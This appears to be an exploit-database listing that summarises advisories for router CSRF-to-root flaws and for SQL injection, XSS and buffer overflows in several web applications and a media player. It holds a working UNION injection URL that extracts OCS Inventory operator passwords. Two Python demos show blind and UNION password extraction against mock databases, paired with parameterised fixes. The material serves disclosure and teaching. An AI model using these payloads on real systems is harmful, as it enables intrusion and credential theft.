Explore all Exploits:

ASMAX 804 gu router Unauthenticated Maintenance Script Vulnerability

ASMAX 804 gu router is a SOHO class device which provides ADSL / WiFi / Ethernet interfaces. The web management interface ships an unauthenticated maintenance script (named 'script') in the /cgi-bin/ directory. When a 'system' parameter is passed to this script, it runs the supplied OS shell command as root. Because no authentication is required, the request can be issued cross-site (CSRF) from any page the victim visits, so a router can be owned remotely with, for example, a simple <img> html tag whose src points to http://192.168.1.1/...

Blind SQL Injection in Escon SupportPortal Pro 3.0

A Blind SQL Injection vulnerability exists in Escon SupportPortal Pro 3.0. The vulnerable parameters are 'cat' and 'tid' in the 'forum.php' file. Because the application does not echo query results or database errors for the injected statement, an attacker infers the contents of the database from differences in the page's response, and can extract sensitive information such as usernames and passwords this way. The vulnerable code is located on lines 60-71 of the 'forum.php' file.
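A worked example of the boolean-based blind extraction described above, added here and not taken from the advisory or from Escon's code. It stands up a constructed in-memory SQLite database with an assumed schema (threads, users), a stand-in for forum.php that pastes 'tid' straight into the query, and an attacker routine that recovers a password one character at a time while observing only whether the page shows a thread. The parameterized variant at the end is the fix.

```python
import sqlite3

# Constructed stand-in for the SupportPortal backend. The schema (threads, users)
# and the query behind forum.php are assumptions made for this example.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE threads (tid INTEGER, cat INTEGER, title TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO threads VALUES (1, 1, 'Welcome');
        INSERT INTO users VALUES ('admin', 's3cr3t');
    """)
    return db

def forum_vulnerable(db, tid):
    """Models forum.php: 'tid' is concatenated into the statement, so a value
    like "1 AND <condition>" changes what the WHERE clause tests."""
    sql = "SELECT title FROM threads WHERE tid=" + tid
    return db.execute(sql).fetchall()

def page_shows_thread(db, tid):
    """The only thing the attacker observes: does the page render a thread or not."""
    return len(forum_vulnerable(db, tid)) > 0

def extract_password(db, username, max_len=32):
    """Boolean-based blind extraction: recover each character of users.password
    with a binary search over its code point, asking only yes/no questions
    (about 7 requests per character instead of up to 95 guesses)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"1 AND (SELECT unicode(substr(password,{pos},1)) FROM users "
                     f"WHERE username='{username}') > {mid}")
            if page_shows_thread(db, probe):
                lo = mid + 1      # the character is above mid
            else:
                hi = mid          # the character is mid or below
        if lo == 0:
            # substr() past the end yields '', unicode('') is NULL and every
            # comparison with NULL is false: the string has been exhausted.
            break
        recovered += chr(lo)
    return recovered

def forum_hardened(db, tid):
    """Fix: coerce the id to an integer and bind it as a parameter, so the
    value is never parsed as SQL."""
    try:
        tid_int = int(tid)
    except (TypeError, ValueError):
        return []
    return db.execute("SELECT title FROM threads WHERE tid=?", (tid_int,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("recovered password:", extract_password(db, "admin"))
    print("hardened, injected :", forum_hardened(db, "1 AND 1=1"))
```

The oracle here is the presence of a thread title; against a real target the same loop would key off response length, a specific string, or an HTTP status, and a time-based variant would replace the condition with a delay when no visible difference exists.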

Open-school SQL Injection Vulnerability

Open-school is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the back-end database, allowing the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulns

The SQL injection exists due to insufficient sanitization of user-supplied input in the 'page' parameter of the 'index.php' script. An attacker can inject arbitrary SQL commands into the application's query and have them executed by the back-end database. The application is also vulnerable to XSS due to insufficient sanitization of user-supplied input in the 'name', 'sender_email' and 'message' parameters of the 'contact_form.php' script. An attacker can inject arbitrary HTML and script code that is executed in the browser of a user viewing the affected page, in the context of the application's origin.

AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) Remote Stack Buffer Overflow PoC (SEH)

AIMP version 2.51 build 330 suffers from a stack-based buffer overflow that can be exploited via a malicious media file carrying ID3 tags (such as an MP3). The overflow overwrites EIP and ECX as well as the SEH record, i.e. the SE handler and the pointer to the next SEH record. The issue is triggered by playing the file (the application crashes within 5 seconds), by viewing the file's metadata, or by pressing the F4 key and selecting the ID3v1 or ID3v2 tab.

OCS Inventory NG – Multiple SQL Injections

The Open Computer and Software (OCS) Inventory Next Generation (NG) provides inventory information about system configurations and software on the network. The server is managed through a web interface. The application does not properly sanitize user input, which results in multiple SQL injections. Affected are the following scripts: download.php (parameters 'N', 'DL', 'O' and 'V') and group_show.php (parameter 'SYSTEMID'). Attackers may be able to manipulate SQL statements in such a way that they retrieve, create or modify information stored in the database, and the injection might also give them a foothold on the underlying system. The vulnerability can be exploited with nothing more than a web browser: http://example.org/ocsreports/download.php?n=1&dl=2&o=3&v=4'union+all+select+concat(id,':',passwd)+from+operators%23 (the UNION appends each operator's id and password from the operators table to the result set; '%23' is a URL-encoded '#', which starts a MySQL comment and discards the remainder of the original statement).
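A worked example of the UNION-based injection in the URL above, added here and not taken from the advisory or from the OCS Inventory NG code base. It models download.php with a constructed in-memory SQLite database (the downloads table, its single-column SELECT and the operators row are assumptions), parses the attack URL exactly as a browser would send it, and shows the operators table leaking into the download listing. Because SQLite has neither MySQL's concat() nor '#' comments, the payload uses '||' and '--' to the same effect. The hardened variant binds every parameter and validates the numeric ones.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the ocsreports backend; schema and data are
# assumptions for this example (the passwd value is a constructed hex string).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE downloads (n INTEGER, dl INTEGER, o INTEGER, v TEXT, filename TEXT);
        CREATE TABLE operators (id TEXT, passwd TEXT);
        INSERT INTO downloads VALUES (1, 2, 3, '4', 'agent-1.0.zip');
        INSERT INTO operators VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db

# SQLite-flavoured version of the advisory's payload: '||' replaces concat()
# and '--' replaces '#' for the trailing comment.
ATTACK_URL = ("http://example.org/ocsreports/download.php"
              "?n=1&dl=2&o=3&v=4'+union+all+select+id||':'||passwd+from+operators--")
BENIGN_URL = "http://example.org/ocsreports/download.php?n=1&dl=2&o=3&v=4"

def params_from_url(url):
    """Decode the query string the way the web server hands it to the script
    ('+' becomes a space, '%23' would become '#')."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}

def download_vulnerable(db, params):
    """Models download.php: every parameter is concatenated into the statement,
    so a quote in 'v' closes the literal and the attacker's UNION is appended."""
    sql = ("SELECT filename FROM downloads WHERE n=%s AND dl=%s AND o=%s AND v='%s'"
           % (params["n"], params["dl"], params["o"], params["v"]))
    return [row[0] for row in db.execute(sql)]

def download_hardened(db, params):
    """Fix: numeric parameters are coerced, all values are bound as
    placeholders, and the statement's shape can no longer change."""
    try:
        n, dl, o = (int(params[k]) for k in ("n", "dl", "o"))
    except (KeyError, ValueError):
        return []
    rows = db.execute(
        "SELECT filename FROM downloads WHERE n=? AND dl=? AND o=? AND v=?",
        (n, dl, o, params.get("v", "")))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", download_vulnerable(db, params_from_url(ATTACK_URL)))
    print("hardened  :", download_hardened(db, params_from_url(ATTACK_URL)))
```

The injected SELECT must return the same number of columns as the original query (one here), which is why the advisory's payload selects a single concatenated id:passwd string rather than two columns.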

RadCLASSIFIEDS Gold v2 Sql Injection

RadCLASSIFIEDS Gold v2 is vulnerable to SQL injection due to insufficient sanitization of user-supplied input in the 'search' parameter of the 'index.php' script. An attacker can exploit this by sending a specially crafted value in that parameter to the vulnerable script, gaining access to the database and extracting sensitive information such as usernames and passwords.

Linksys WAG54G2 router

The Linksys WAG54G2 router is a popular SOHO class device that provides ADSL / WiFi / Ethernet interfaces. When logged into the web management console, it is possible to execute commands as root. An attacker can exploit this issue remotely (using CSRF), provided the victim has not changed the default password of the web management interface. The vendor (Cisco) was contacted in March '09 and confirmed the issue, but it still remains unpatched.
